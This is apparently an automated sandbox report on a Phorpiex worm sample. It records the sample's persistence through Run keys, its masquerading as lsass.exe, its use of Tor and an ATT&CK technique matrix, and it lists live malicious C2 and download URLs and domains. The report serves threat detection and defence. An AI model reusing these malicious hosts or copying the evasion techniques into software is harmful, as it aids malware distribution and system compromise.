            Source: 6K1uYM85lS.exe, 00000000.00000002.2255091970.000000000153D000.00000004.00000020.00020000.00000000.sdmp, 6K1uYM85lS.exe, 00000000.00000002.2255091970.000000000150C000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000005.00000002.2426849925.000000000145D000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000006.00000002.2509392759.000000000146C000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2589532690.0000000000A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: lsass.exe, 00000008.00000002.2589543390.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWMSAFD RfComm [Bluetooth]RSVP TCP Service Provider
            Source: lsass.exe, 00000005.00000002.2426687670.0000000001424000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000006.00000002.2509309205.0000000001434000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2589394386.0000000000A35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
            Source: lsass.exe, 00000005.00000002.2426915020.000000000147E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWRSVP UDP Service Provider
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeAPI call chain: ExitProcess graph end nodegraph_0-6155
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeAPI call chain: ExitProcess graph end nodegraph_0-6170
            Source: C:\180771693628709\lsass.exeAPI call chain: ExitProcess graph end nodegraph_5-6155
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009A9030 LoadLibraryA,GetProcAddress,0_2_009A9030
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009AFE60 CryptImportKey,CreateFileW,GetFileSize,CreateFileMappingA,MapViewOfFile,CryptCreateHash,GetProcessHeap,HeapAlloc,CryptHashData,CryptVerifySignatureA,memcpy,GetProcessHeap,HeapFree,UnmapViewOfFile,CloseHandle,SetFilePointer,SetEndOfFile,CloseHandle,CryptDestroyKey,0_2_009AFE60
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: memset,GetLocaleInfoA,strcmp,0_2_009B0240
            Source: C:\180771693628709\lsass.exeCode function: memset,GetLocaleInfoA,strcmp,5_2_00780240
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009A3C60 GetSystemTimeAsFileTime,0_2_009A3C60

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\180771693628709\lsass.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center AntiSpywareOverrideJump to behavior

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: Process Memory Space: 6K1uYM85lS.exe PID: 3200, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: lsass.exe PID: 4596, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: lsass.exe PID: 5308, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: lsass.exe PID: 2884, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: lsass.exe PID: 3320, type: MEMORYSTR
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009A8E30 socket,setsockopt,htons,htonl,bind,listen,getsockname,htons,htons,closesocket,0_2_009A8E30
            Source: C:\180771693628709\lsass.exeCode function: 5_2_00778E30 socket,setsockopt,htons,htonl,bind,listen,getsockname,htons,htons,closesocket,5_2_00778E30
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
            Valid Accounts12
            Native API
            1
            Registry Run Keys / Startup Folder
            1
            Process Injection
            1
            Disable or Modify Tools
            OS Credential Dumping1
            System Time Discovery
            Remote Services11
            Archive Collected Data
            Exfiltration Over Other Network Medium4
            Ingress Tool Transfer
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
            Data Encrypted for Impact
            Acquire InfrastructureGather Victim Identity Information
            Default Accounts2
            Command and Scripting Interpreter
            Boot or Logon Initialization Scripts1
            Registry Run Keys / Startup Folder
            1
            Deobfuscate/Decode Files or Information
            LSASS Memory1
            File and Directory Discovery
            Remote Desktop Protocol3
            Clipboard Data
            Exfiltration Over Bluetooth22
            Encrypted Channel
            SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
            Domain AccountsAtLogon Script (Windows)Logon Script (Windows)2
            Obfuscated Files or Information
            Security Account Manager12
            System Information Discovery
            SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration11
            Non-Standard Port
            Data Encrypted for ImpactDNS ServerEmail Addresses
            Local AccountsCronLogin HookLogin Hook1
            Masquerading
            NTDS111
            Security Software Discovery
            Distributed Component Object ModelInput CaptureTraffic Duplication3
            Non-Application Layer Protocol
            Data DestructionVirtual Private ServerEmployee Names
            Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Virtualization/Sandbox Evasion
            LSA Secrets1
            Virtualization/Sandbox Evasion
            SSHKeyloggingScheduled Transfer14
            Application Layer Protocol
            Data Encrypted for ImpactServerGather Victim Network Information
            Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Process Injection
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureData Transfer Size Limits1
            Proxy
            Service StopBotnetDomain Properties
            External Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Hidden Files and Directories
            DCSync1
            System Network Configuration Discovery
            Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1372442 Sample: 6K1uYM85lS.exe Startdate: 10/01/2024 Architecture: WINDOWS Score: 100 24 api.wipmania.com 2->24 26 gotsomefile.top 2->26 28 2 other IPs or domains 2->28 38 Multi AV Scanner detection for domain / URL 2->38 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 46 7 other signatures 2->46 7 6K1uYM85lS.exe 2 14 2->7         started        12 lsass.exe 12 2->12         started        14 lsass.exe 12 2->14         started        16 lsass.exe 12 2->16         started        signatures3 44 Tries to detect the country of the analysis system (by using the IP) 24->44 process4 dnsIp5 36 api.wipmania.com 127.0.0.1 unknown unknown 7->36 22 C:\180771693628709\lsass.exe, PE32 7->22 dropped 56 Found evasive API chain (may stop execution after checking mutex) 7->56 58 Found Tor onion address 7->58 60 Drops PE files with benign system names 7->60 62 Hides that the sample has been downloaded from the Internet (zone.identifier) 7->62 18 lsass.exe 7 12 7->18         started        file6 signatures7 process8 dnsIp9 30 185.215.113.93, 49719, 49747, 49748 WHOLESALECONNECTIONSNL Portugal 18->30 32 86.59.21.38, 49739, 49760, 80 UTA-ASAT Austria 18->32 34 16 other IPs or domains 18->34 48 Antivirus detection for dropped file 18->48 50 Multi AV Scanner detection for dropped file 18->50 52 Found evasive API chain (may stop execution after checking mutex) 18->52 54 4 other signatures 18->54 signatures10

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            6K1uYM85lS.exe72%ReversingLabsWin32.Worm.Phorpiex
            6K1uYM85lS.exe71%VirustotalBrowse
            6K1uYM85lS.exe100%AviraHEUR/AGEN.1360733
            6K1uYM85lS.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\180771693628709\lsass.exe100%AviraHEUR/AGEN.1360733
            C:\180771693628709\lsass.exe100%Joe Sandbox ML
            C:\180771693628709\lsass.exe72%ReversingLabsWin32.Worm.Phorpiex
            No Antivirus matches
            SourceDetectionScannerLabelLink
            gimmefile.top11%VirustotalBrowse
            feedmefile.top9%VirustotalBrowse
            api.wipmania.com0%VirustotalBrowse
            gotsomefile.top9%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://api.wipmania.com/UAMozilla/5.00%Avira URL Cloudsafe
            http://%sHTTP/1.00%Avira URL Cloudsafe
            http://api.wipmania.com/s0%Avira URL Cloudsafe
            http://185.215.113.93/c1100%Avira URL Cloudmalware
            http://185.215.113.93/c2100%Avira URL Cloudmalware
            https://131.188.40.189:443/tor/status-vote/current/consensus.z100%Avira URL Cloudmalware
            http://199.58.81.140/tor/status-vote/current/consensus.z100%Avira URL Cloudmalware
            http://185.215.113.93/100%Avira URL Cloudmalware
            http://149.56.45.200:9030/tor/server/fp/0077bcba7244db3e6a5ed2746e86170066684887+00d2ce3c2153ea09786f2105f26b138cf759424f+014326416058dcfd0965167026cbef647409a000+024a48d0eaff4761daa976248343c44f8223f4cc+02c0c261048dd34c4701de9b26748f18bf877d5c+035f813195f0cb9f567edfdf60c6745ca36ba0bd+04102613d8f998e956a7868d2de5a532ee2473ea+04dfe047acdf7a6620aca782fafc5ef1ae7f4754+0823ecb30ec0e634acf0b143127320a828258da8+08b9d6ba5b0e544ed1094a862130a9386cce682c+098f98538a21a16332e8c4b724305c2a3496a467+0a11c7546a1332412d1ebd13bd4c3d6a6644d7e0+0af982cc71a01d95e8959d763d0ec0e5a6c61244+0cf2f07ff0581ebbccdf209e655694358a98d816+0e5c4e180b8ad3260ff54cabbd50c6e80dc4a729+0f1c8168dfd0aadbe61bd71194d37c867fed5a21.z0%Avira URL Cloudsafe
            http://www.48838389493.jo/0%Avira URL Cloudsafe
            http://api.wipmania.com/0%Avira URL Cloudsafe
            http://feedmefile.top/100%Avira URL Cloudmalware
            http://86.59.21.38/tor/status-vote/current/consensus.z100%Avira URL Cloudmalware
            http://7fv5nq57k4qvbrpt.onion/0%Avira URL Cloudsafe
            http://199.58.81.140/tor/server/fp/02a0d8ddf4da4e601c1c66143bb0c8a0f2f3c857+02c0c261048dd34c4701de9b26748f18bf877d5c+04102613d8f998e956a7868d2de5a532ee2473ea+042bcdf2d36d7aee070e086dad4b57f27b2f1143+07da591e5bb420e5d6460ef146ef6a8776ef6ba5+083c52051140db8af770bd40c7c8883efff4caf3+08cd9d4224058dc97a1f27679a5bee5724c4c6ec+09a70e396de93f54d4541bbb0ec8e2b23761f34f+0c36ae99b744e32088c9ed23d7a31f8d23ae1a58+0c5cfd7cc30251555ac3a8b2f87e523430477fb1+0c68d484c72c44e8f1abef8637c156f69de8f08b+0d0a07d71e8229af56125b8bcb19ecb030b97133+0dc16feaa5a5e27a974009cbf7748bb6faae6de1+0eb05178de949d3e8eeec0bc02ed20ff0995f56c+0f35f5ddd162199b60b2d2cbc9bb7e35a084aff6+0f64a062eeb86ccfd243848263cd69b708bce805.z0%Avira URL Cloudsafe
            http://api.wipmania.com/-0%Avira URL Cloudsafe
            http://7fv5nq57k4qvbrpt.onion/C:0%Avira URL Cloudsafe
            http://%sMozilla/5.00%Avira URL Cloudsafe
            http://%s:%hu/tor/status-vote/current/consensus.zdirectory-footer0%Avira URL Cloudsafe
            http://193.11.164.243:9030/tor/status-vote/current/consensus.z0%Avira URL Cloudsafe
            http://gimmefile.top/100%Avira URL Cloudmalware
            http://gotsomefile.top/100%Avira URL Cloudmalware
            http://127.0.0.1:%humsvcrt.dllsscanf_s_beginthreadexSecur32.dllInitSecurityInterfaceA2000%Avira URL Cloudsafe
            http://127.0.0.1:%hu0%Avira URL Cloudsafe
            http://%s:%hu/tor/server/fp/%s.z0%Avira URL Cloudsafe
            http://api.wipmania.com/E0%Avira URL Cloudsafe
            http://185.215.113.93/c6100%Avira URL Cloudmalware
            http://www.48838389493.jo/f5d4s54s4sds5d5d5d3r3hr8h38h8h38f8hffw4tw84thw4h8th8w4h8t3rvr3r3bru3urbu3r0%Avira URL Cloudsafe
            http://185.215.113.93/c5100%Avira URL Cloudmalware
            http://7fv5nq57k4qvbrpt.onion/http://185.215.113.93/http://feedmefile.top/http://gotsomefile.top/htt0%Avira URL Cloudsafe
            http://185.215.113.93/c4100%Avira URL Cloudmalware
            http://185.215.113.93/c3100%Avira URL Cloudmalware
            http://%s:%hu/tor/status-vote/current/consensus.z0%Avira URL Cloudsafe
            http://%s:%hu/tor/server/fp/%s.zrouter0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            api.wipmania.com
            127.0.0.1
            truetrueunknown
            feedmefile.top
            unknown
            unknowntrueunknown
            gotsomefile.top
            unknown
            unknowntrueunknown
            gimmefile.top
            unknown
            unknowntrueunknown
            NameMaliciousAntivirus DetectionReputation
            http://185.215.113.93/c2true
            • Avira URL Cloud: malware
            unknown
            http://185.215.113.93/c1true
            • Avira URL Cloud: malware
            unknown
            https://131.188.40.189:443/tor/status-vote/current/consensus.zfalse
            • Avira URL Cloud: malware
            unknown
            http://199.58.81.140/tor/status-vote/current/consensus.zfalse
            • Avira URL Cloud: malware
            unknown
            http://149.56.45.200:9030/tor/server/fp/0077bcba7244db3e6a5ed2746e86170066684887+00d2ce3c2153ea09786f2105f26b138cf759424f+014326416058dcfd0965167026cbef647409a000+024a48d0eaff4761daa976248343c44f8223f4cc+02c0c261048dd34c4701de9b26748f18bf877d5c+035f813195f0cb9f567edfdf60c6745ca36ba0bd+04102613d8f998e956a7868d2de5a532ee2473ea+04dfe047acdf7a6620aca782fafc5ef1ae7f4754+0823ecb30ec0e634acf0b143127320a828258da8+08b9d6ba5b0e544ed1094a862130a9386cce682c+098f98538a21a16332e8c4b724305c2a3496a467+0a11c7546a1332412d1ebd13bd4c3d6a6644d7e0+0af982cc71a01d95e8959d763d0ec0e5a6c61244+0cf2f07ff0581ebbccdf209e655694358a98d816+0e5c4e180b8ad3260ff54cabbd50c6e80dc4a729+0f1c8168dfd0aadbe61bd71194d37c867fed5a21.zfalse
            • Avira URL Cloud: safe
            unknown
            http://86.59.21.38/tor/status-vote/current/consensus.zfalse
            • Avira URL Cloud: malware
            unknown
            http://199.58.81.140/tor/server/fp/02a0d8ddf4da4e601c1c66143bb0c8a0f2f3c857+02c0c261048dd34c4701de9b26748f18bf877d5c+04102613d8f998e956a7868d2de5a532ee2473ea+042bcdf2d36d7aee070e086dad4b57f27b2f1143+07da591e5bb420e5d6460ef146ef6a8776ef6ba5+083c52051140db8af770bd40c7c8883efff4caf3+08cd9d4224058dc97a1f27679a5bee5724c4c6ec+09a70e396de93f54d4541bbb0ec8e2b23761f34f+0c36ae99b744e32088c9ed23d7a31f8d23ae1a58+0c5cfd7cc30251555ac3a8b2f87e523430477fb1+0c68d484c72c44e8f1abef8637c156f69de8f08b+0d0a07d71e8229af56125b8bcb19ecb030b97133+0dc16feaa5a5e27a974009cbf7748bb6faae6de1+0eb05178de949d3e8eeec0bc02ed20ff0995f56c+0f35f5ddd162199b60b2d2cbc9bb7e35a084aff6+0f64a062eeb86ccfd243848263cd69b708bce805.zfalse
            • Avira URL Cloud: safe
            unknown
            http://193.11.164.243:9030/tor/status-vote/current/consensus.zfalse
            • Avira URL Cloud: safe
            unknown
            http://185.215.113.93/c6true
            • Avira URL Cloud: malware
            unknown
            http://185.215.113.93/c5true
            • Avira URL Cloud: malware
            unknown
            http://185.215.113.93/c4true
            • Avira URL Cloud: malware
            unknown
            http://185.215.113.93/c3true
            • Avira URL Cloud: malware
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://api.wipmania.com/UAMozilla/5.06K1uYM85lS.exe, lsass.exe.0.drtrue
            • Avira URL Cloud: safe
            unknown
            http://%sHTTP/1.06K1uYM85lS.exe, lsass.exe.0.drfalse
            • Avira URL Cloud: safe
            low
            http://api.wipmania.com/slsass.exe, 00000008.00000002.2589351852.0000000000A12000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://185.215.113.93/6K1uYM85lS.exe, lsass.exe.0.drtrue
            • Avira URL Cloud: malware
            unknown
            http://api.wipmania.com/lsass.exe, 00000005.00000002.2426687670.0000000001424000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000006.00000002.2509379686.000000000145C000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000006.00000002.2509309205.0000000001434000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000006.00000002.2509290088.0000000001412000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000006.00000000.2450597790.0000000000785000.00000002.00000001.01000000.00000006.sdmp, lsass.exe, 00000006.00000002.2509099309.0000000000785000.00000002.00000001.01000000.00000006.sdmp, lsass.exe, 00000008.00000002.2589351852.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2589394386.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2589257665.0000000000785000.00000002.00000001.01000000.00000006.sdmp, lsass.exe, 00000008.00000002.2589510100.0000000000A60000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.2532345540.0000000000785000.00000002.00000001.01000000.00000006.sdmp, 6K1uYM85lS.exe, lsass.exe.0.drtrue
            • Avira URL Cloud: safe
            unknown
            http://www.48838389493.jo/lsass.exe, lsass.exe, 00000005.00000000.2361258510.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000006.00000000.2450612893.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000008.00000002.2589269379.0000000000789000.00000008.00000001.01000000.00000006.sdmp, 6K1uYM85lS.exe, lsass.exe.0.drfalse
            • Avira URL Cloud: safe
            unknown
            http://feedmefile.top/6K1uYM85lS.exe, lsass.exe.0.drtrue
            • Avira URL Cloud: malware
            unknown
            http://7fv5nq57k4qvbrpt.onion/lsass.exe, 00000008.00000002.2589096829.00000000004FA000.00000004.00000010.00020000.00000000.sdmp, 6K1uYM85lS.exe, lsass.exe.0.drtrue
            • Avira URL Cloud: safe
            unknown
            http://api.wipmania.com/-6K1uYM85lS.exe, 00000000.00000002.2255091970.000000000150C000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://7fv5nq57k4qvbrpt.onion/C:6K1uYM85lS.exe, 00000000.00000002.2254661523.00000000012FA000.00000004.00000010.00020000.00000000.sdmptrue
            • Avira URL Cloud: safe
            unknown
            http://%sMozilla/5.06K1uYM85lS.exe, lsass.exe.0.drfalse
            • Avira URL Cloud: safe
            low
            http://%s:%hu/tor/status-vote/current/consensus.zdirectory-footer6K1uYM85lS.exe, lsass.exe.0.drfalse
            • Avira URL Cloud: safe
            low
            http://gimmefile.top/6K1uYM85lS.exe, lsass.exe.0.drtrue
            • Avira URL Cloud: malware
            unknown
            http://gotsomefile.top/6K1uYM85lS.exe, lsass.exe.0.drtrue
            • Avira URL Cloud: malware
            unknown
            http://127.0.0.1:%humsvcrt.dllsscanf_s_beginthreadexSecur32.dllInitSecurityInterfaceA2006K1uYM85lS.exe, lsass.exe.0.drfalse
            • Avira URL Cloud: safe
            low
            http://127.0.0.1:%hulsass.exe, lsass.exe, 00000005.00000000.2361258510.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000006.00000000.2450612893.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000008.00000002.2589269379.0000000000789000.00000008.00000001.01000000.00000006.sdmp, 6K1uYM85lS.exe, lsass.exe.0.drfalse
            • Avira URL Cloud: safe
            low
            http://%s:%hu/tor/server/fp/%s.zlsass.exe, lsass.exe, 00000005.00000000.2361258510.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000006.00000000.2450612893.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000008.00000002.2589269379.0000000000789000.00000008.00000001.01000000.00000006.sdmp, 6K1uYM85lS.exe, lsass.exe.0.drfalse
            • Avira URL Cloud: safe
            low
            http://api.wipmania.com/E6K1uYM85lS.exe, 00000000.00000002.2255091970.000000000150C000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.48838389493.jo/f5d4s54s4sds5d5d5d3r3hr8h38h8h38f8hffw4tw84thw4h8th8w4h8t3rvr3r3bru3urbu3r6K1uYM85lS.exe, lsass.exe.0.drfalse
            • Avira URL Cloud: safe
            unknown
            http://7fv5nq57k4qvbrpt.onion/http://185.215.113.93/http://feedmefile.top/http://gotsomefile.top/htt6K1uYM85lS.exe, lsass.exe.0.drtrue
            • Avira URL Cloud: safe
            unknown
            http://%s:%hu/tor/status-vote/current/consensus.zlsass.exe, lsass.exe, 00000005.00000000.2361258510.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000006.00000000.2450612893.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000008.00000002.2589269379.0000000000789000.00000008.00000001.01000000.00000006.sdmp, 6K1uYM85lS.exe, lsass.exe.0.drfalse
            • Avira URL Cloud: safe
            low
            http://%s:%hu/tor/server/fp/%s.zrouter6K1uYM85lS.exe, lsass.exe.0.drfalse
            • Avira URL Cloud: safe
            low
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            149.56.44.47
            unknownCanada
            16276OVHFRfalse
            172.81.131.84
            unknownUnited States
            27176DATAWAGONUSfalse
            193.11.164.243
            unknownSweden
            1653SUNETSUNETSwedishUniversityNetworkEUfalse
            157.90.77.166
            unknownUnited States
            766REDIRISRedIRISAutonomousSystemESfalse
            199.58.81.140
            unknownCanada
            7765KOUMBITCAfalse
            51.15.42.19
            unknownFrance
            12876OnlineSASFRfalse
            66.175.235.244
            unknownUnited States
            8560ONEANDONE-ASBrauerstrasse48DEfalse
            213.32.71.116
            unknownFrance
            16276OVHFRfalse
            130.185.250.214
            unknownBulgaria
            57344TELEHOUSE-ASBGfalse
            107.189.8.226
            unknownUnited States
            53667PONYNETUSfalse
            86.59.21.38
            unknownAustria
            8437UTA-ASATfalse
            178.170.10.3
            unknownFrance
            21409IKOULAFRfalse
            207.244.78.230
            unknownUnited States
            30633LEASEWEB-USA-WDCUSfalse
            149.56.45.200
            unknownCanada
            16276OVHFRfalse
            154.35.175.225
            unknownUnited States
            14987RETHEMHOSTINGUSfalse
            131.188.40.189
            unknownGermany
            680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse
            95.217.42.50
            unknownGermany
            24940HETZNER-ASDEfalse
            185.215.113.93
            unknownPortugal
            206894WHOLESALECONNECTIONSNLtrue
            IP
            127.0.0.1
            Joe Sandbox version:38.0.0 Ammolite
            Analysis ID:1372442
            Start date and time:2024-01-10 15:37:06 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 8m 29s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:9
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:6K1uYM85lS.exe
            renamed because original name is a hash value
            Original Sample Name:8cd916321f1c8a63bd9fafb52a478ac65b3e86a33966bbfce60f5e46ffee6b8c.exe
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@6/1@13/19
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 10
            • Number of non-executed functions: 113
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Override analysis time to 240000 for current running targets taking high CPU consumption
            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            TimeTypeDescription
            15:38:12AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Host Process for Windows Services C:\180771693628709\lsass.exe
            15:38:21AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Host Process for Windows Services C:\180771693628709\lsass.exe
            15:38:29AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Host Process for Windows Services C:\180771693628709\lsass.exe
            15:38:54API Interceptor6428848x Sleep call for process: lsass.exe modified
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            193.11.164.243SecuriteInfo.com.W32.MSIL_Kryptik.EWM.genEldorado.30775.exeGet hashmaliciousUnknownBrowse
            • 193.11.164.243:9030/tor/status-vote/current/consensus.z
            97238623.exeGet hashmaliciousUnknownBrowse
            • 193.11.164.243:9030/tor/server/fp/79509683ab4c8ddaf90a120c69a4179c6cd5a387+795790c25bde834b836ea54dd96db2610829573b+7961c9991f022c8a363fd440ca395d47db5d44d5.z
            t.exeGet hashmaliciousXmrigBrowse
            • 193.11.164.243:9030/tor/status-vote/current/consensus.z
            199.58.81.140Bra6yVctsX.exeGet hashmaliciousSystemBCBrowse
            • 199.58.81.140/tor/status-vote/current/consensus
            x3WX1kHqcx.exeGet hashmaliciousSystemBCBrowse
            • 199.58.81.140/tor/status-vote/current/consensus
            iUoBt2SHML.exeGet hashmaliciousSystemBCBrowse
            • 199.58.81.140/tor/status-vote/current/consensus
            oGO7Hy4YCH.exeGet hashmaliciousSystemBCBrowse
            • 199.58.81.140/tor/status-vote/current/consensus
            iSyDaCjFVY.exeGet hashmaliciousSystemBCBrowse
            • 199.58.81.140/tor/status-vote/current/consensus
            F75rJPKdGb.exeGet hashmaliciousKronosBrowse
            • 199.58.81.140/tor/status-vote/current/consensus
            lHCBcjZBib.exeGet hashmaliciousKronosBrowse
            • 199.58.81.140/tor/status-vote/current/consensus
            KTi0r6xqtH.exeGet hashmaliciousKronosBrowse
            • 199.58.81.140/tor/status-vote/current/consensus
            4i2nattkLT.exeGet hashmaliciousKronosBrowse
            • 199.58.81.140/tor/status-vote/current/consensus
            F1MwWrwBR7.exeGet hashmaliciousKronosBrowse
            • 199.58.81.140/tor/status-vote/current/consensus
            6729001591617.exeGet hashmaliciousKronosBrowse
            • 199.58.81.140/tor/status-vote/current/consensus
            xLH4kwOjXR.exeGet hashmaliciousUnknownBrowse
            • 199.58.81.140/tor/status-vote/current/consensus
            osi.exeGet hashmaliciousKronosBrowse
            • 199.58.81.140/tor/status-vote/current/consensus
            us6quGOhfX.exeGet hashmaliciousUnknownBrowse
            • 199.58.81.140/tor/status-vote/current/consensus
            taugif.exeGet hashmaliciousUnknownBrowse
            • 199.58.81.140/tor/status-vote/current/consensus
            hgJC8DQxr4.exeGet hashmaliciousUnknownBrowse
            • 199.58.81.140/tor/status-vote/current/consensus
            bill4759.docGet hashmaliciousBrowse
            • 199.58.81.140/tor/status-vote/current/consensus
            22FLJ9.jsGet hashmaliciousBrowse
            • 199.58.81.140/tor/status-vote/current/consensus
            No context
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            OVHFRhttps://bit.ly/3RPzJ7AGet hashmaliciousPorn ScamBrowse
            • 158.69.126.131
            https://nhp.pages.dev/account/js-reporting/?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=%2Faccount%2Fchallenge%2FpasswordGet hashmaliciousUnknownBrowse
            • 51.68.39.188
            https://iplog.co/24FCf6Get hashmaliciousUnknownBrowse
            • 94.23.17.185
            file.exeGet hashmaliciousEternity Stealer, LummaC Stealer, SmokeLoader, Vidar, zgRATBrowse
            • 198.245.60.91
            http://camparowhon.comGet hashmaliciousUnknownBrowse
            • 51.222.241.106
            https://free-pdf-pro.comGet hashmaliciousUnknownBrowse
            • 51.195.5.194
            bBpYD3aXuL.exeGet hashmaliciousBazaLoader, SmokeLoaderBrowse
            • 51.75.129.204
            LIgiTBz5qJ.exeGet hashmaliciousAgentTeslaBrowse
            • 144.217.198.22
            PVmTRgBVL0.exeGet hashmaliciousAgentTeslaBrowse
            • 144.217.198.22
            ONbKLCjIMD.exeGet hashmaliciousFormBookBrowse
            • 144.217.103.3
            1uPo6vy0ih.exeGet hashmaliciousSnake KeyloggerBrowse
            • 51.38.247.67
            q3qJ5G153F.exeGet hashmaliciousAgentTeslaBrowse
            • 91.121.38.6
            http://checkrain.comGet hashmaliciousUnknownBrowse
            • 149.56.240.27
            https://www.family-history.co.za/supp/MitlD/dk/oo/Get hashmaliciousHTMLPhisherBrowse
            • 158.69.119.97
            https://wallpapercave.com/Get hashmaliciousUnknownBrowse
            • 51.222.39.187
            https://cbbreogan.servidortierra.com/upload/css/zx/Get hashmaliciousUnknownBrowse
            • 151.80.237.40
            https://www.anti.wizbest.com/Get hashmaliciousUnknownBrowse
            • 51.222.239.232
            https://www.google.com/amp/s/app.clientrelationbuilder.com/Doc///marc.farmer///bWFyYy5mYXJtZXJAb3prLmNvbQ==Get hashmaliciousUnknownBrowse
            • 51.68.142.31
